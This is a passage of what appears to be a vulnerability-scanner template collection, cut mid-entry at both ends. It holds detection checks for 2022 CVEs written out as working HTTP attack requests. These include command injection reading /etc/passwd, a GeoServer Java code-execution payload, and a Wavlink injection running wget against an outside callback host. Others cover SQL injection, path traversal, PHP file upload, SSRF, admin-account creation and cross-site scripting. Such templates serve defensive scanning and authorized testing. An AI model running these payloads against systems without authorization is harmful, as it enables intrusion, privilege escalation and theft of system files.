{{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_2, \"toplevel_page_paytm\")"],"condition":"and"}]}]},{"id":"CVE-2022-31126","info":{"name":"Roxy-WI <6.1.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /app/options.py HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/app/login.py\n\nalert_consumer=1&serv=127.0.0.1&ipbackend=\";cat+/etc/passwd+##&backend_server=127.0.0.1\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0948","info":{"name":"WordPress Order Listener for WooCommerce <3.2.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/olistener/new HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"id\":\" (SLEEP(6))#\"}\n","GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"application/json\")","contains(body_2, \"olistener-action.olistener-controller\")"],"condition":"and"}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34049","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/ExportLogs.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Login","Password"],"condition":"and"},{"type":"word","part":"header","words":["filename=\"sysLogs.txt\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29301","info":{"name":"SolarView Compact 6.00 - 'pow' Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","SolarView"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-46888","info":{"name":"NexusPHP <1.7.33 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?secret=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>\">","NexusPHP"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38463","info":{"name":"ServiceNow - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["top.location.href = 'javascript:alert(document.domain)';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45038","info":{"name":"WBCE CMS v1.5.4 -  Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/ HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=no&formtoken={{formtoken}}&website_footer=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_trash=inline&home_folders=true&intro_page=false&frontend_login=false&frontend_signup=false&submit=&default_language=EN&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&wbmailer_default_sendername=WBCE+CMS+Mailer&wbmailer_routine=phpmail&wbmailer_smtp_host=&wbmailer_smtp_port=&wbmailer_smtp_secure=&wbmailer_smtp_username=&wbmailer_smtp_password=\n","GET /search/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Results For"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-4060","info":{"name":"WordPress User Post Gallery <=2.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["recordsFiltered"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(5)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"cookie-reuse":true,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2022-1952');?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_1, 'success\\\":true')","contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')"],"condition":"and"}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-29005","info":{"name":"Online Birth Certificate System 1.2 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /obcs/user/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmobno={{username}}&password={{password}}&login=\n","POST /obcs/user/profile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nfname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n","GET /obcs/user/dashboard.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'admin-name\\\">{{str}}<script>alert(document.domain);</script>')"],"condition":"and"}]}]},{"id":"CVE-2022-0441","info":{"name":"MasterStudy LMS <2.7.6 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"user_login\":\"{{username}}\",\"user_email\":\"{{user_email}}\",\"user_password\":\"{{password}}\",\"user_password_re\":\"{{password}}\",\"become_instructor\":\"\",\"privacy_policy\":true,\"degree\":\"\",\"expertize\":\"\",\"auditory\":\"\",\"additional\":[],\"additional_instructors\":[],\"profile_default_fields_for_register\":{\"wp_capabilities\":{\"value\":{\"administrator\":1}}}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration completed successfully","\"status\":\"success\""],"condition":"and"},{"type":"word","part":"header_2","words":["application/json;"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["\"stm_lms_register\":\"([0-9a-z]+)\""],"internal":true},{"type":"kval","kval":["user_email","password"]}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23854","info":{"name":"AVEVA InTouch Access Anywhere Secure Gateway - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support","extensions"],"condition":"and"},{"type":"word","part":"header","words":["EricomSecureGateway"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-42748","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-2488","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/touchlist_sync.cgi?IP=;wget+http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-23347","info":{"name":"BigAnt Server v5.6.06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3800","info":{"name":"IBAX - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /api/v2/open/rowsInfo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\norder=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"usesysid\")"],"condition":"and"}]}]},{"id":"CVE-2022-23102","info":{"name":"SINEMA Remote Connect Server < V2.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\n","POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: csrftoken={{csrf}};\nReferer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh\n\ncsrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}\n"],"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"csrf","part":"body","group":1,"regex":["name='csrfmiddlewaretoken' value='(.*)' />"],"internal":true}]}]},{"id":"CVE-2022-30776","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error: 1<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34753","info":{"name":"SpaceLogic C-Bus Home Controller <=1.31.460 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /delsnap.pl?name=|id HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2185","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa","1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424","6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778","a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-0150","info":{"name":"WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wah_target_src = '';alert(document.domain);//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32771","info":{"name":"WWBN AVideo 11.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["avideoAlertSuccess(\"</script><script>alert(document.cookie);</script>","text: \"</script><script>alert(document.cookie);</script>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication 